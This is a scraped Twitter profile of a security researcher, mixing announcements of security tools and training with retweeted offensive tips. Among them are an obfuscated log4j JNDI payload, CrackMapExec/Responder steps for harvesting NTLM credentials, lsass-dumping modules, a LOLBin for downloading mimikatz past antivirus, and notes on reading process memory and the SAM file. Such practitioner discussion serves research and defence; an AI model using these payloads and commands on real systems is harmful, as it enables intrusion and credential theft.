brezel @br3zel - Twitter Profile

brezel @br3zel

about 1 month ago

Great trainer and great content, took the training and liked it A LOT!

[email protected] / EDRmetry / PurpleLabs

@cr0nym

5 months ago

💥 2026 - here we go! I am excited to announce the release of "Linux Attack, Detection, and Live Forensics v2.0 - Hands-on Purple Teaming Playbook"! In this fully hands-on guide, I've leveled up the Linux-oriented purple teaming experience to bridge the gap between red and blue teams like never before: - 💙 Focus on cutting-edge research and development of Linux offensive techniques -> empowering blue teams to understand and anticipate real-world Linux threats. - ❤️ Dive into the detection perspective, explore corresponding events, telemetry, evidence, and chained detections -> giving red teams the insights to refine their Linux evasion strategies. - 💜 Map it all to expected EDR/Runtime functionalities and DFIR processes, fostering true collaboration for purple teaming excellence. The link is here: https://t.co/SUktIBXgHt

cr0nym's tweet photo. 💥 2026 - here we go! I am excited to announce the release of "Linux Attack, Detection, and Live Forensics v2.0 - Hands-on Purple Teaming Playbook"! In this fully hands-on guide, I've leveled up the Linux-oriented purple teaming experience to bridge the gap between red and blue teams like never before:
- 💙 Focus on cutting-edge research and development of Linux offensive techniques -> empowering blue teams to understand and anticipate real-world Linux threats.
- ❤️ Dive into the detection perspective, explore corresponding events, telemetry, evidence, and chained detections -> giving red teams the insights to refine their Linux evasion strategies.
- 💜 Map it all to expected EDR/Runtime functionalities and DFIR processes, fostering true collaboration for purple teaming excellence.

The link is here: https://t.co/SUktIBXgHt

2

44

9

45

8K

0

13

brezel @br3zel

about 1 month ago

CVE-2026-41651 — PackageKit TOCTOU ("Pack2TheRoot") https://t.co/9f17fTGlHH

0

9

br3zel retweeted

Lukas Klein | @rantasec.bsky.social @RantaSec

3 months ago

Check out GoLinHound: - Discovers Linux & SSH attack paths - Outputs OpenGraph JSON for BloodHound ingestion - Integrates with SharpHound and AzureHound data to unveil cross-technology attack paths https://t.co/HPh2xiiCzl

2

76

34

50

4K

br3zel retweeted

Velociraptor @velocidex

over 2 years ago

Watch the replay of VeloCON 2023 on our YouTube channel. You can relive the entire conference or watch any individual presentations you may have missed. https://t.co/3yrHOYHAfc

0

20

9

7

2K

Who to follow

Security Researcher, Hacker. Breaking new stuff, voiding warranties and finding out how things work!

br3zel retweeted

Niklaus Schiess @_takeshix

about 4 years ago

My latest North Korea research with @martyn_williams is now publicly available: https://t.co/SdURXMxPj7 Also added it to the DB: https://t.co/HRCQcgvcZz

0

13

6

3

0

brezel @br3zel

over 4 years ago

@SadProcessor @falconforceteam Congrats!

0

br3zel retweeted

stypr @brokenpacifist

over 4 years ago

${jndi:${lower:l}${lower:d}a${lower:p}://loc${upper:a}lhost:1389/rce} log4j bypass lol Lessons learned: Don't use Java.

28

2K

450

202

0

br3zel retweeted

diversenok @diversenok_zero

over 4 years ago

Did you know that it is possible to read memory using a PROCESS_CREATE_PROCESS handle? Just call NtCreateProcessEx to clone the target process (and its entire address space), and then read anything you want from there.😎

10

376

87

59

0

br3zel retweeted

mpgn @mpgn_x64

over 4 years ago

Lately, two new tools for dumping the lsass process have come up: HandleKatz and nanodump 👀 I've integrated them to CrackMapExec as module: 1⃣ -M handlekatz 2⃣ -M nanodump 3⃣ -M procdump (as bonus 😝) (dmp parsed by pypykatz from @SkelSec ) Available on @porchetta_ind 🪂

mpgn_x64's tweet photo. Lately, two new tools for dumping the lsass process have come up: HandleKatz and nanodump 👀

I've integrated them to CrackMapExec as module:
1⃣ -M handlekatz
2⃣ -M nanodump
3⃣ -M procdump (as bonus 😝)
(dmp parsed by pypykatz from @SkelSec )

Available on @porchetta_ind 🪂 https://t.co/yJSC1JxrsQ

4

721

262

120

0

br3zel retweeted

The Hacker's Choice (@[email protected])

@hackerschoice

over 4 years ago

Threema does not have forward secrecy (https://t.co/WZKvpI6gx6) and local keys are stored insecurely. DROPPED from https://t.co/9O7m8Nq3XB. Stay safe. #privacy #COP26

0

18

11

2

0

br3zel retweeted

Elliot @ElliotKillick

over 4 years ago

Need to go under the radar downloading #mimikatz (and other suspect payloads)? Then newly discovered #lolbin "C:\Windows\System32\Cmdl32.exe" (signed by MS) is for you. It's like a new certutil.exe but absolutely unheard of by any antivirus software!

39

3K

1K

635

0

br3zel retweeted

mpgn @mpgn_x64

over 4 years ago

In case you want to see something cool about CrackMapExec and Responder 😌😋 1⃣ cme smb <ip> -u user -p pass --shares 2⃣ Responder -I eth0 3⃣ cme smb <ip> -u user -p pass -M slinky -o ... Harvest ntlmv2/v1 credentials in no time if you have write access to a share 🔥 🪂

mpgn_x64's tweet photo. In case you want to see something cool about CrackMapExec and Responder 😌😋

1⃣ cme smb <ip> -u user -p pass --shares
2⃣ Responder -I eth0
3⃣ cme smb <ip> -u user -p pass -M slinky -o ...

Harvest ntlmv2/v1 credentials in no time if you have write access to a share 🔥

🪂 https://t.co/Xr9QRLtp9T

15

932

347

219

0

br3zel retweeted

Quarks @quarkswdr

almost 5 years ago

Erst ein krasses Tabu – und irgendwann empört sich keiner mehr. Dafür gibt's einen einfachen Trick. Aus aktuellem Anlass.

56

826

312

61

0

br3zel retweeted

Florian Roth ⚡️

@cyb3rops

almost 5 years ago

For a compromise assessment of #Exchange servers I recommend using our free THOR Lite scanner We've added all rules & IOCs relevant to #ProxyShell exploitation & update them frequently THOR Lite https://t.co/gG1xDLRnjz YARA rules https://t.co/j6k4ydJd4i https://t.co/pJiVhY0f10

cyb3rops's tweet photo. For a compromise assessment of #Exchange servers I recommend using our free THOR Lite scanner

We've added all rules & IOCs relevant to #ProxyShell exploitation & update them frequently

THOR Lite
https://t.co/gG1xDLRnjz

YARA rules
https://t.co/j6k4ydJd4i
https://t.co/pJiVhY0f10 https://t.co/b1J2C2SnmI

0

142

54

21

0

br3zel retweeted

The Daily Swig @DailySwig

almost 5 years ago

ICYMI: Top hacks from Black Hat and DEF CON 2021 https://t.co/xmA02jzUUK

0

5

3

1

0

br3zel retweeted

Maximus @gladiatx0r

almost 5 years ago

I've published my first 'Gist' combining several well known techniques to accomplish Windows workstation takeover in a default Active Directory Configuration. SMB writeable shares are spicier than ever. 🌶️ https://t.co/feS1Cs6GaJ

8

501

182

133

0

br3zel retweeted

Walter.Legowski @SadProcessor

about 5 years ago

Made a SharpHound Collection Cheat Sheet and a little post to go with it... #BloodHoundAD https://t.co/7eXhoCTsBq

5

267

127

59

0

br3zel retweeted

Jonas L @jonasLyk

almost 5 years ago

yarh- for some reason on win11 the SAM file now is READ for users. So if you have shadowvolumes enabled you can read the sam file like this: I dont know the full extent of the issue yet, but its too many to not be a problem I think.